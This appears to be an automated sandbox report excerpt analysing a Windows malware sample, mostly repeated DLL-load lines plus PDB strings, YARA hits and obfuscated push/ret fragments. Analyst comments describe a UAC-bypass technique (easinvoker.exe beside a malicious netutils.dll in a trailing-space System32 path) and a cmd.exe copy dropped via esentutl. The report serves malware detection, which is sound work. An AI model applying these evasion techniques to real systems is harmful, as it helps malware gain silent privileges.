                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: Window Recorder | Window detected: more than 3 window changes detected
Source: XjPA2pnUhC.exe | Static file information: file size 1088512 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb | found in: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb | found in: XjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
(easinvoker.exe is an auto-elevating Windows binary; loaders commonly copy it into a "Windows \System32" path with a trailing space next to a malicious netutils.dll to gain a silent UAC bypass through DLL search order. Its PDB name inside the unpacked payload is a lead for that technique, not proof of it.)
Source: Binary string: cmd.pdbUGP | found in: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source: Binary string: easinvoker.pdbH | found in: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL | found in: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E621000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E650000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb | found in: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
(The cmd.pdb string inside alpha.pif.4.dr identifies the dropped alpha.pif as a renamed copy of cmd.exe, written by esentutl.exe, which also held the string in memory while copying it.)

                    Data Obfuscation

Source: Yara match | File source: 0.2.XjPA2pnUhC.exe.22a65a8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
Source: alpha.pif.4.dr | Static PE information: TimeDateStamp 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC], a link time in the future. Caveat: alpha.pif is a renamed cmd.exe (see its cmd.pdb string), and Microsoft builds Windows binaries reproducibly with a hash in this field rather than a clock value, so a nonsensical date is expected for the file and is not on its own evidence of tampering.
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0290894C: LoadLibraryW, GetProcAddress, FreeLibrary (API resolved at run time instead of through the import table)
Source: alpha.pif.4.dr | Static PE information: section name .didat (delay-load import data; this section is normal for cmd.exe, which alpha.pif is a copy of)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028F63AE: push 028F640Bh; ret (ret at 0_2_028F6403)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028F63B0: push 028F640Bh; ret (ret at 0_2_028F6403)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028FC349: push 8B028FC1h; ret (ret at 0_2_028FC34E)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0291C378: push 0291C56Eh; ret (ret at 0_2_0291C566)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028F6784: push 028F67C6h; ret (ret at 0_2_028F67BE)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028F6782: push 028F67C6h; ret (ret at 0_2_028F67BE)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_029CE716: push ecx; ret (ret at 0_2_029CE729)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_029AC446: push ecx; ret (ret at 0_2_029AC459)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0291C570: push 0291C56Eh; ret (ret at 0_2_0291C566)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028FC56C: push ecx; mov dword ptr [esp], edx (at 0_2_028FC571)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_02908AD8: push 02908B10h; ret (ret at 0_2_02908B08)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0290AAE0: push 0290AB18h; ret (ret at 0_2_0290AB10)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028FCA4E: push 028FCD72h; ret (ret at 0_2_028FCD6A)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_02964A50: push eax; ret (ret at 0_2_02964B20)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028FCBEC: push 028FCD72h; ret (ret at 0_2_028FCD6A)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0290886C: push 029088AEh; ret (ret at 0_2_029088A6)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_02906946: push 029069F3h; ret (ret at 0_2_029069EB)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_02906948: push 029069F3h; ret (ret at 0_2_029069EB)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_02902F60: push 02902FD6h; ret (ret at 0_2_02902FCE)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0291D2FC: push 0291D367h; ret (ret at 0_2_0291D35F)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028F332C: push eax; ret (ret at 0_2_028F3368)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0291D0AC: push 0291D125h; ret (ret at 0_2_0291D11D)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_029CF038: push eax; ret (ret at 0_2_029CF056)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0290306B: push 029030B9h; ret (ret at 0_2_029030B1)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0290306C: push 029030B9h; ret (ret at 0_2_029030B1)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0291D1F8: push 0291D288h; ret (ret at 0_2_0291D280)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0290F108: push ecx; mov dword ptr [esp], edx (at 0_2_0290F10D)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0291D144: push 0291D1ECh; ret (ret at 0_2_0291D1E4)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_028FD5A0: push 028FD5CCh; ret (ret at 0_2_028FD5C4)
